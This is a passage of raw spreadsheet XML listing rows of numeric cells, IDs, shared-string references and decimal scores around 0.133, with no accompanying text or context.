        <v>0.1342592592592593</v>
      </c>
    </row>
    <row r="23520" ht="15.75" customHeight="1">
      <c r="A23520" s="1">
        <v>20723.0</v>
      </c>
      <c r="B23520" s="2">
        <v>1.4659306E7</v>
      </c>
      <c r="C23520" s="2" t="s">
        <v>22682</v>
      </c>
      <c r="D23520" s="2">
        <v>1.0</v>
      </c>
      <c r="E23520" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23520" s="2">
        <v>0.1342592592592593</v>
      </c>
    </row>
    <row r="23521" ht="15.75" customHeight="1">
      <c r="A23521" s="1">
        <v>24402.0</v>
      </c>
      <c r="B23521" s="2">
        <v>1.080961E7</v>
      </c>
      <c r="C23521" s="2" t="s">
        <v>22683</v>
      </c>
      <c r="D23521" s="2">
        <v>1.0</v>
      </c>
      <c r="E23521" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23521" s="2">
        <v>0.1342592592592593</v>
      </c>
    </row>
    <row r="23522" ht="15.75" customHeight="1">
      <c r="A23522" s="1">
        <v>25225.0</v>
      </c>
      <c r="B23522" s="2">
        <v>1.3310629E7</v>
      </c>
      <c r="C23522" s="2" t="s">
        <v>22684</v>
      </c>
      <c r="D23522" s="2">
        <v>1.0</v>
      </c>
      <c r="E23522" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23522" s="2">
        <v>0.1342592592592593</v>
      </c>
    </row>
    <row r="23523" ht="15.75" customHeight="1">
      <c r="A23523" s="1">
        <v>31324.0</v>
      </c>
      <c r="B23523" s="2">
        <v>4973765.0</v>
      </c>
      <c r="C23523" s="2" t="s">
        <v>22685</v>
      </c>
      <c r="D23523" s="2">
        <v>1.0</v>
      </c>
      <c r="E23523" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23523" s="2">
        <v>0.1342592592592593</v>
      </c>
    </row>
    <row r="23524" ht="15.75" customHeight="1">
      <c r="A23524" s="1">
        <v>24723.0</v>
      </c>
      <c r="B23524" s="2">
        <v>1.1711202E7</v>
      </c>
      <c r="C23524" s="2" t="s">
        <v>22686</v>
      </c>
      <c r="D23524" s="2">
        <v>1.0</v>
      </c>
      <c r="E23524" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23524" s="2">
        <v>0.1342592592592592</v>
      </c>
    </row>
    <row r="23525" ht="15.75" customHeight="1">
      <c r="A23525" s="1">
        <v>25866.0</v>
      </c>
      <c r="B23525" s="2">
        <v>1.4891616E7</v>
      </c>
      <c r="C23525" s="2" t="s">
        <v>22687</v>
      </c>
      <c r="D23525" s="2">
        <v>1.0</v>
      </c>
      <c r="E23525" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23525" s="2">
        <v>0.1342592592592592</v>
      </c>
    </row>
    <row r="23526" ht="15.75" customHeight="1">
      <c r="A23526" s="1">
        <v>20938.0</v>
      </c>
      <c r="B23526" s="2">
        <v>1.6468242E7</v>
      </c>
      <c r="C23526" s="2" t="s">
        <v>22688</v>
      </c>
      <c r="D23526" s="2">
        <v>1.0</v>
      </c>
      <c r="E23526" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23526" s="2">
        <v>0.1339285714285715</v>
      </c>
    </row>
    <row r="23527" ht="15.75" customHeight="1">
      <c r="A23527" s="1">
        <v>22912.0</v>
      </c>
      <c r="B23527" s="2">
        <v>4.8294823E7</v>
      </c>
      <c r="C23527" s="2" t="s">
        <v>22689</v>
      </c>
      <c r="D23527" s="2">
        <v>1.0</v>
      </c>
      <c r="E23527" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23527" s="2">
        <v>0.1339285714285715</v>
      </c>
    </row>
    <row r="23528" ht="15.75" customHeight="1">
      <c r="A23528" s="1">
        <v>30587.0</v>
      </c>
      <c r="B23528" s="2">
        <v>4118261.0</v>
      </c>
      <c r="C23528" s="2" t="s">
        <v>22690</v>
      </c>
      <c r="D23528" s="2">
        <v>1.0</v>
      </c>
      <c r="E23528" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23528" s="2">
        <v>0.1339285714285715</v>
      </c>
    </row>
    <row r="23529" ht="15.75" customHeight="1">
      <c r="A23529" s="1">
        <v>33925.0</v>
      </c>
      <c r="B23529" s="2">
        <v>9281656.0</v>
      </c>
      <c r="C23529" s="2" t="s">
        <v>22691</v>
      </c>
      <c r="D23529" s="2">
        <v>1.0</v>
      </c>
      <c r="E23529" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23529" s="2">
        <v>0.1339285714285715</v>
      </c>
    </row>
    <row r="23530" ht="15.75" customHeight="1">
      <c r="A23530" s="1">
        <v>5871.0</v>
      </c>
      <c r="B23530" s="2">
        <v>4.7014243E7</v>
      </c>
      <c r="C23530" s="2" t="s">
        <v>22692</v>
      </c>
      <c r="D23530" s="2">
        <v>1.0</v>
      </c>
      <c r="E23530" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23530" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="23531" ht="15.75" customHeight="1">
      <c r="A23531" s="1">
        <v>22651.0</v>
      </c>
      <c r="B23531" s="2">
        <v>4.1004442E7</v>
      </c>
      <c r="C23531" s="2" t="s">
        <v>22693</v>
      </c>
      <c r="D23531" s="2">
        <v>1.0</v>
      </c>
      <c r="E23531" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23531" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="23532" ht="15.75" customHeight="1">
      <c r="A23532" s="1">
        <v>23927.0</v>
      </c>
      <c r="B23532" s="2">
        <v>8597279.0</v>
      </c>
      <c r="C23532" s="2" t="s">
        <v>22694</v>
      </c>
      <c r="D23532" s="2">
        <v>1.0</v>
      </c>
      <c r="E23532" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23532" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="23533" ht="15.75" customHeight="1">
      <c r="A23533" s="1">
        <v>24166.0</v>
      </c>
      <c r="B23533" s="2">
        <v>1.0179935E7</v>
      </c>
      <c r="C23533" s="2" t="s">
        <v>22695</v>
      </c>
      <c r="D23533" s="2">
        <v>1.0</v>
      </c>
      <c r="E23533" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23533" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="23534" ht="15.75" customHeight="1">
      <c r="A23534" s="1">
        <v>24898.0</v>
      </c>
      <c r="B23534" s="2">
        <v>1.2306307E7</v>
      </c>
      <c r="C23534" s="2" t="s">
        <v>22696</v>
      </c>
      <c r="D23534" s="2">
        <v>1.0</v>
      </c>
      <c r="E23534" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23534" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="23535" ht="15.75" customHeight="1">
      <c r="A23535" s="1">
        <v>25276.0</v>
      </c>
      <c r="B23535" s="2">
        <v>1.339492E7</v>
      </c>
      <c r="C23535" s="2" t="s">
        <v>22697</v>
      </c>
      <c r="D23535" s="2">
        <v>1.0</v>
      </c>
      <c r="E23535" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23535" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="23536" ht="15.75" customHeight="1">
      <c r="A23536" s="1">
        <v>25946.0</v>
      </c>
      <c r="B23536" s="2">
        <v>1.5235034E7</v>
      </c>
      <c r="C23536" s="2" t="s">
        <v>22698</v>
      </c>
      <c r="D23536" s="2">
        <v>1.0</v>
      </c>
      <c r="E23536" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23536" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="23537" ht="15.75" customHeight="1">
      <c r="A23537" s="1">
        <v>26904.0</v>
      </c>
      <c r="B23537" s="2">
        <v>1.931955E7</v>
      </c>
      <c r="C23537" s="2" t="s">
        <v>22699</v>
      </c>
      <c r="D23537" s="2">
        <v>1.0</v>
      </c>
      <c r="E23537" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23537" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="23538" ht="15.75" customHeight="1">
      <c r="A23538" s="1">
        <v>29849.0</v>
      </c>
      <c r="B23538" s="2">
        <v>3.5718305E7</v>
      </c>
      <c r="C23538" s="2" t="s">
        <v>22700</v>
      </c>
      <c r="D23538" s="2">
        <v>1.0</v>
      </c>
      <c r="E23538" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23538" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="23539" ht="15.75" customHeight="1">
      <c r="A23539" s="1">
        <v>29996.0</v>
      </c>
      <c r="B23539" s="2">
        <v>3612218.0</v>
      </c>
      <c r="C23539" s="2" t="s">
        <v>22701</v>
      </c>
      <c r="D23539" s="2">
        <v>1.0</v>
      </c>
      <c r="E23539" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23539" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="23540" ht="15.75" customHeight="1">
      <c r="A23540" s="1">
        <v>31616.0</v>
      </c>
      <c r="B23540" s="2">
        <v>5143786.0</v>
      </c>
      <c r="C23540" s="2" t="s">
        <v>22702</v>
      </c>
      <c r="D23540" s="2">
        <v>1.0</v>
      </c>
      <c r="E23540" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23540" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="23541" ht="15.75" customHeight="1">
      <c r="A23541" s="1">
        <v>33900.0</v>
      </c>
      <c r="B23541" s="2">
        <v>9213556.0</v>
      </c>
      <c r="C23541" s="2" t="s">
        <v>22703</v>
      </c>
      <c r="D23541" s="2">
        <v>1.0</v>
      </c>
      <c r="E23541" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23541" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="23542" ht="15.75" customHeight="1">
      <c r="A23542" s="1">
        <v>10486.0</v>
      </c>
      <c r="B23542" s="2">
        <v>1.1007392E7</v>
      </c>
      <c r="C23542" s="2" t="s">
        <v>22704</v>
      </c>
      <c r="D23542" s="2">
        <v>1.0</v>
      </c>
      <c r="E23542" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23542" s="2">
        <v>0.1335282651072125</v>
      </c>
    </row>
    <row r="23543" ht="15.75" customHeight="1">
      <c r="A23543" s="1">
        <v>15106.0</v>
      </c>
      <c r="B23543" s="2">
        <v>4.183156E7</v>
      </c>
      <c r="C23543" s="2" t="s">
        <v>22705</v>
      </c>
      <c r="D23543" s="2">
        <v>1.0</v>
      </c>
      <c r="E23543" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23543" s="2">
        <v>0.1335282651072125</v>
      </c>
    </row>
    <row r="23544" ht="15.75" customHeight="1">
      <c r="A23544" s="1">
        <v>22957.0</v>
      </c>
      <c r="B23544" s="2">
        <v>4903934.0</v>
      </c>
      <c r="C23544" s="2" t="s">
        <v>22706</v>
      </c>
      <c r="D23544" s="2">
        <v>1.0</v>
      </c>
      <c r="E23544" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23544" s="2">
        <v>0.1335282651072125</v>
      </c>
    </row>
    <row r="23545" ht="15.75" customHeight="1">
      <c r="A23545" s="1">
        <v>26209.0</v>
      </c>
      <c r="B23545" s="2">
        <v>1.624396E7</v>
      </c>
      <c r="C23545" s="2" t="s">
        <v>22707</v>
      </c>
      <c r="D23545" s="2">
        <v>1.0</v>
      </c>
      <c r="E23545" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23545" s="2">
        <v>0.1335282651072125</v>
      </c>
    </row>
    <row r="23546" ht="15.75" customHeight="1">
      <c r="A23546" s="1">
        <v>26749.0</v>
      </c>
      <c r="B23546" s="2">
        <v>1.8372666E7</v>
      </c>
      <c r="C23546" s="2" t="s">
        <v>22708</v>
      </c>
      <c r="D23546" s="2">
        <v>1.0</v>
      </c>
      <c r="E23546" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23546" s="2">
        <v>0.1335125448028674</v>
      </c>
    </row>
    <row r="23547" ht="15.75" customHeight="1">
      <c r="A23547" s="1">
        <v>26223.0</v>
      </c>
      <c r="B23547" s="2">
        <v>1.6273339E7</v>
      </c>
      <c r="C23547" s="2" t="s">
        <v>22709</v>
      </c>
      <c r="D23547" s="2">
        <v>1.0</v>
      </c>
      <c r="E23547" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23547" s="2">
        <v>0.1331569664902999</v>
      </c>
    </row>
    <row r="23548" ht="15.75" customHeight="1">
      <c r="A23548" s="1">
        <v>25150.0</v>
      </c>
      <c r="B23548" s="2">
        <v>1.3059673E7</v>
      </c>
      <c r="C23548" s="2" t="s">
        <v>22710</v>
      </c>
      <c r="D23548" s="2">
        <v>1.0</v>
      </c>
      <c r="E23548" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23548" s="2">
        <v>0.1331569664902998</v>
      </c>
    </row>
    <row r="23549" ht="15.75" customHeight="1">
      <c r="A23549" s="1">
        <v>25438.0</v>
      </c>
      <c r="B23549" s="2">
        <v>1.38746E7</v>
      </c>
      <c r="C23549" s="2" t="s">
        <v>22711</v>
      </c>
      <c r="D23549" s="2">
        <v>1.0</v>
      </c>
      <c r="E23549" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23549" s="2">
        <v>0.1331569664902998</v>
      </c>
    </row>
    <row r="23550" ht="15.75" customHeight="1">
      <c r="A23550" s="1">
        <v>12396.0</v>
      </c>
      <c r="B23550" s="2">
        <v>2.8929185E7</v>
      </c>
      <c r="C23550" s="2" t="s">
        <v>22712</v>
      </c>
      <c r="D23550" s="2">
        <v>1.0</v>
      </c>
      <c r="E23550" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23550" s="2">
        <v>0.1331417624521073</v>
      </c>
    </row>
    <row r="23551" ht="15.75" customHeight="1">
      <c r="A23551" s="1">
        <v>21331.0</v>
      </c>
      <c r="B23551" s="2">
        <v>2.1049993E7</v>
      </c>
      <c r="C23551" s="2" t="s">
        <v>22713</v>
      </c>
      <c r="D23551" s="2">
        <v>1.0</v>
      </c>
      <c r="E23551" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23551" s="2">
        <v>0.1331417624521073</v>
      </c>
    </row>
    <row r="23552" ht="15.75" customHeight="1">
      <c r="A23552" s="1">
        <v>22945.0</v>
      </c>
      <c r="B23552" s="2">
        <v>4888839.0</v>
      </c>
      <c r="C23552" s="2" t="s">
        <v>22714</v>
      </c>
      <c r="D23552" s="2">
        <v>1.0</v>
      </c>
      <c r="E23552" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23552" s="2">
        <v>0.1331417624521073</v>
      </c>
    </row>
    <row r="23553" ht="15.75" customHeight="1">
      <c r="A23553" s="1">
        <v>33553.0</v>
      </c>
      <c r="B23553" s="2">
        <v>8193850.0</v>
      </c>
      <c r="C23553" s="2" t="s">
        <v>22715</v>
      </c>
      <c r="D23553" s="2">
        <v>1.0</v>
      </c>
      <c r="E23553" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23553" s="2">
        <v>0.1331417624521073</v>
      </c>
    </row>
    <row r="23554" ht="15.75" customHeight="1">
      <c r="A23554" s="1">
        <v>9397.0</v>
      </c>
      <c r="B23554" s="2">
        <v>5.5751801E7</v>
      </c>
      <c r="C23554" s="2" t="s">
        <v>22716</v>
      </c>
      <c r="D23554" s="2">
        <v>1.0</v>
      </c>
      <c r="E23554" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23554" s="2">
        <v>0.1331236897274633</v>
      </c>
    </row>
    <row r="23555" ht="15.75" customHeight="1">
      <c r="A23555" s="1">
        <v>23137.0</v>
      </c>
      <c r="B23555" s="2">
        <v>5.1569448E7</v>
      </c>
      <c r="C23555" s="2" t="s">
        <v>22717</v>
      </c>
      <c r="D23555" s="2">
        <v>1.0</v>
      </c>
      <c r="E23555" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23555" s="2">
        <v>0.132768361581921</v>
      </c>
    </row>
    <row r="23556" ht="15.75" customHeight="1">
      <c r="A23556" s="1">
        <v>33958.0</v>
      </c>
      <c r="B23556" s="2">
        <v>9321142.0</v>
      </c>
      <c r="C23556" s="2" t="s">
        <v>22718</v>
      </c>
      <c r="D23556" s="2">
        <v>1.0</v>
      </c>
      <c r="E23556" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23556" s="2">
        <v>0.132768361581921</v>
      </c>
    </row>
    <row r="23557" ht="15.75" customHeight="1">
      <c r="A23557" s="1">
        <v>21781.0</v>
      </c>
      <c r="B23557" s="2">
        <v>2.6477931E7</v>
      </c>
      <c r="C23557" s="2" t="s">
        <v>22719</v>
      </c>
      <c r="D23557" s="2">
        <v>1.0</v>
      </c>
      <c r="E23557" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23557" s="2">
        <v>0.1327683615819209</v>
      </c>
    </row>
    <row r="23558" ht="15.75" customHeight="1">
      <c r="A23558" s="1">
        <v>30107.0</v>
      </c>
      <c r="B23558" s="2">
        <v>3.6651552E7</v>
      </c>
      <c r="C23558" s="2" t="s">
        <v>22720</v>
      </c>
      <c r="D23558" s="2">
        <v>1.0</v>
      </c>
      <c r="E23558" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23558" s="2">
        <v>0.1327683615819209</v>
      </c>
    </row>
    <row r="23559" ht="15.75" customHeight="1">
      <c r="A23559" s="1">
        <v>31079.0</v>
      </c>
      <c r="B23559" s="2">
        <v>4.8330947E7</v>
      </c>
      <c r="C23559" s="2" t="s">
        <v>22721</v>
      </c>
      <c r="D23559" s="2">
        <v>1.0</v>
      </c>
      <c r="E23559" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23559" s="2">
        <v>0.1327683615819209</v>
      </c>
    </row>
    <row r="23560" ht="15.75" customHeight="1">
      <c r="A23560" s="1">
        <v>31489.0</v>
      </c>
      <c r="B23560" s="2">
        <v>5.0600951E7</v>
      </c>
      <c r="C23560" s="2" t="s">
        <v>22722</v>
      </c>
      <c r="D23560" s="2">
        <v>1.0</v>
      </c>
      <c r="E23560" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23560" s="2">
        <v>0.1327683615819209</v>
      </c>
    </row>
    <row r="23561" ht="15.75" customHeight="1">
      <c r="A23561" s="1">
        <v>5047.0</v>
      </c>
      <c r="B23561" s="2">
        <v>4.4323366E7</v>
      </c>
      <c r="C23561" s="2" t="s">
        <v>22723</v>
      </c>
      <c r="D23561" s="2">
        <v>1.0</v>
      </c>
      <c r="E23561" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23561" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="23562" ht="15.75" customHeight="1">
      <c r="A23562" s="1">
        <v>14502.0</v>
      </c>
      <c r="B23562" s="2">
        <v>3.9687206E7</v>
      </c>
      <c r="C23562" s="2" t="s">
        <v>22724</v>
      </c>
      <c r="D23562" s="2">
        <v>1.0</v>
      </c>
      <c r="E23562" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23562" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="23563" ht="15.75" customHeight="1">
      <c r="A23563" s="1">
        <v>18409.0</v>
      </c>
      <c r="B23563" s="2">
        <v>5.2673619E7</v>
      </c>
      <c r="C23563" s="2" t="s">
        <v>22725</v>
      </c>
      <c r="D23563" s="2">
        <v>1.0</v>
      </c>
      <c r="E23563" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23563" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="23564" ht="15.75" customHeight="1">
      <c r="A23564" s="1">
        <v>20952.0</v>
      </c>
      <c r="B23564" s="2">
        <v>1.6647611E7</v>
      </c>
      <c r="C23564" s="2" t="s">
        <v>22726</v>
      </c>
      <c r="D23564" s="2">
        <v>1.0</v>
      </c>
      <c r="E23564" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23564" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="23565" ht="15.75" customHeight="1">
      <c r="A23565" s="1">
        <v>21135.0</v>
      </c>
      <c r="B23565" s="2">
        <v>1.8488899E7</v>
      </c>
      <c r="C23565" s="2" t="s">
        <v>22727</v>
      </c>
      <c r="D23565" s="2">
        <v>1.0</v>
      </c>
      <c r="E23565" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23565" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="23566" ht="15.75" customHeight="1">
      <c r="A23566" s="1">
        <v>21704.0</v>
      </c>
      <c r="B23566" s="2">
        <v>2.5265763E7</v>
      </c>
      <c r="C23566" s="2" t="s">
        <v>22728</v>
      </c>
      <c r="D23566" s="2">
        <v>1.0</v>
      </c>
      <c r="E23566" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23566" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="23567" ht="15.75" customHeight="1">
      <c r="A23567" s="1">
        <v>21805.0</v>
      </c>
      <c r="B23567" s="2">
        <v>2.6756365E7</v>
      </c>
      <c r="C23567" s="2" t="s">
        <v>22729</v>
      </c>
      <c r="D23567" s="2">
        <v>1.0</v>
      </c>
      <c r="E23567" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23567" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="23568" ht="15.75" customHeight="1">
      <c r="A23568" s="1">
        <v>22352.0</v>
      </c>
      <c r="B23568" s="2">
        <v>3.4570109E7</v>
      </c>
      <c r="C23568" s="2" t="s">
        <v>22730</v>
      </c>
      <c r="D23568" s="2">
        <v>1.0</v>
      </c>
      <c r="E23568" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23568" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="23569" ht="15.75" customHeight="1">
      <c r="A23569" s="1">
        <v>23106.0</v>
      </c>
      <c r="B23569" s="2">
        <v>5095179.0</v>
      </c>
      <c r="C23569" s="2" t="s">
        <v>22731</v>
      </c>
      <c r="D23569" s="2">
        <v>1.0</v>
      </c>
      <c r="E23569" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23569" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="23570" ht="15.75" customHeight="1">
      <c r="A23570" s="1">
        <v>24098.0</v>
      </c>
      <c r="B23570" s="2">
        <v>9831507.0</v>
      </c>
      <c r="C23570" s="2" t="s">
        <v>22732</v>
      </c>
      <c r="D23570" s="2">
        <v>1.0</v>
      </c>
      <c r="E23570" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23570" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="23571" ht="15.75" customHeight="1">
      <c r="A23571" s="1">
        <v>27723.0</v>
      </c>
      <c r="B23571" s="2">
        <v>2.3063025E7</v>
      </c>
      <c r="C23571" s="2" t="s">
        <v>22733</v>
      </c>
      <c r="D23571" s="2">
        <v>1.0</v>
      </c>
      <c r="E23571" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23571" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="23572" ht="15.75" customHeight="1">
      <c r="A23572" s="1">
        <v>28378.0</v>
      </c>
      <c r="B23572" s="2">
        <v>2.6105639E7</v>
      </c>
      <c r="C23572" s="2" t="s">
        <v>22734</v>
      </c>
      <c r="D23572" s="2">
        <v>1.0</v>
      </c>
      <c r="E23572" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23572" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="23573" ht="15.75" customHeight="1">
      <c r="A23573" s="1">
        <v>29819.0</v>
      </c>
      <c r="B23573" s="2">
        <v>3.5277636E7</v>
      </c>
      <c r="C23573" s="5" t="s">
        <v>22735</v>
      </c>
      <c r="D23573" s="2">
        <v>1.0</v>
      </c>
      <c r="E23573" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23573" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="23574" ht="15.75" customHeight="1">
      <c r="A23574" s="1">
        <v>30528.0</v>
      </c>
      <c r="B23574" s="2">
        <v>4.0324164E7</v>
      </c>
      <c r="C23574" s="2" t="s">
        <v>22736</v>
      </c>
      <c r="D23574" s="2">
        <v>1.0</v>
      </c>
      <c r="E23574" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23574" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="23575" ht="15.75" customHeight="1">
      <c r="A23575" s="1">
        <v>32467.0</v>
      </c>
      <c r="B23575" s="2">
        <v>5683251.0</v>
      </c>
      <c r="C23575" s="2" t="s">
        <v>22737</v>
      </c>
      <c r="D23575" s="2">
        <v>1.0</v>
      </c>
      <c r="E23575" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23575" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="23576" ht="15.75" customHeight="1">
      <c r="A23576" s="1">
        <v>33412.0</v>
      </c>
      <c r="B23576" s="2">
        <v>7736974.0</v>
      </c>
      <c r="C23576" s="2" t="s">
        <v>22738</v>
      </c>
      <c r="D23576" s="2">
        <v>1.0</v>
      </c>
      <c r="E23576" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23576" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="23577" ht="15.75" customHeight="1">
      <c r="A23577" s="1">
        <v>34094.0</v>
      </c>
      <c r="B23577" s="2">
        <v>9696819.0</v>
      </c>
      <c r="C23577" s="2" t="s">
        <v>22739</v>
      </c>
      <c r="D23577" s="2">
        <v>1.0</v>
      </c>
      <c r="E23577" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23577" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="23578" ht="15.75" customHeight="1">
      <c r="A23578" s="1">
        <v>28720.0</v>
      </c>
      <c r="B23578" s="2">
        <v>2.7908767E7</v>
      </c>
      <c r="C23578" s="2" t="s">
        <v>22740</v>
      </c>
      <c r="D23578" s="2">
        <v>1.0</v>
      </c>
      <c r="E23578" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23578" s="2">
        <v>0.1324786324786325</v>
      </c>
    </row>
    <row r="23579" ht="15.75" customHeight="1">
      <c r="A23579" s="1">
        <v>33481.0</v>
      </c>
      <c r="B23579" s="2">
        <v>7997737.0</v>
      </c>
      <c r="C23579" s="2" t="s">
        <v>22741</v>
      </c>
      <c r="D23579" s="2">
        <v>1.0</v>
      </c>
      <c r="E23579" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23579" s="2">
        <v>0.1324786324786325</v>
      </c>
    </row>
    <row r="23580" ht="15.75" customHeight="1">
      <c r="A23580" s="1">
        <v>34215.0</v>
      </c>
      <c r="B23580" s="2">
        <v>2.960991E7</v>
      </c>
      <c r="C23580" s="2" t="s">
        <v>22742</v>
      </c>
      <c r="D23580" s="2">
        <v>1.0</v>
      </c>
      <c r="E23580" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23580" s="2">
        <v>0.1324786324786325</v>
      </c>
    </row>
    <row r="23581" ht="15.75" customHeight="1">
      <c r="A23581" s="1">
        <v>20462.0</v>
      </c>
      <c r="B23581" s="2">
        <v>1.2690787E7</v>
      </c>
      <c r="C23581" s="2" t="s">
        <v>22743</v>
      </c>
      <c r="D23581" s="2">
        <v>1.0</v>
      </c>
      <c r="E23581" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23581" s="2">
        <v>0.1324074074074074</v>
      </c>
    </row>
    <row r="23582" ht="15.75" customHeight="1">
      <c r="A23582" s="1">
        <v>22231.0</v>
      </c>
      <c r="B23582" s="2">
        <v>3.2469159E7</v>
      </c>
      <c r="C23582" s="2" t="s">
        <v>22744</v>
      </c>
      <c r="D23582" s="2">
        <v>1.0</v>
      </c>
      <c r="E23582" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23582" s="2">
        <v>0.1324074074074074</v>
      </c>
    </row>
    <row r="23583" ht="15.75" customHeight="1">
      <c r="A23583" s="1">
        <v>23877.0</v>
      </c>
      <c r="B23583" s="2">
        <v>8360851.0</v>
      </c>
      <c r="C23583" s="2" t="s">
        <v>22745</v>
      </c>
      <c r="D23583" s="2">
        <v>1.0</v>
      </c>
      <c r="E23583" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23583" s="2">
        <v>0.1324074074074074</v>
      </c>
    </row>
    <row r="23584" ht="15.75" customHeight="1">
      <c r="A23584" s="1">
        <v>25063.0</v>
      </c>
      <c r="B23584" s="2">
        <v>1.2873992E7</v>
      </c>
      <c r="C23584" s="2" t="s">
        <v>22746</v>
      </c>
      <c r="D23584" s="2">
        <v>1.0</v>
      </c>
      <c r="E23584" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23584" s="2">
        <v>0.1324074074074074</v>
      </c>
    </row>
    <row r="23585" ht="15.75" customHeight="1">
      <c r="A23585" s="1">
        <v>22451.0</v>
      </c>
      <c r="B23585" s="2">
        <v>3625179.0</v>
      </c>
      <c r="C23585" s="2" t="s">
        <v>22747</v>
      </c>
      <c r="D23585" s="2">
        <v>1.0</v>
      </c>
      <c r="E23585" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23585" s="2">
        <v>0.1323232323232323</v>
      </c>
    </row>
    <row r="23586" ht="15.75" customHeight="1">
      <c r="A23586" s="1">
        <v>24993.0</v>
      </c>
      <c r="B23586" s="2">
        <v>1.2690786E7</v>
      </c>
      <c r="C23586" s="2" t="s">
        <v>22748</v>
      </c>
      <c r="D23586" s="2">
        <v>1.0</v>
      </c>
      <c r="E23586" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23586" s="2">
        <v>0.1323232323232323</v>
      </c>
    </row>
    <row r="23587" ht="15.75" customHeight="1">
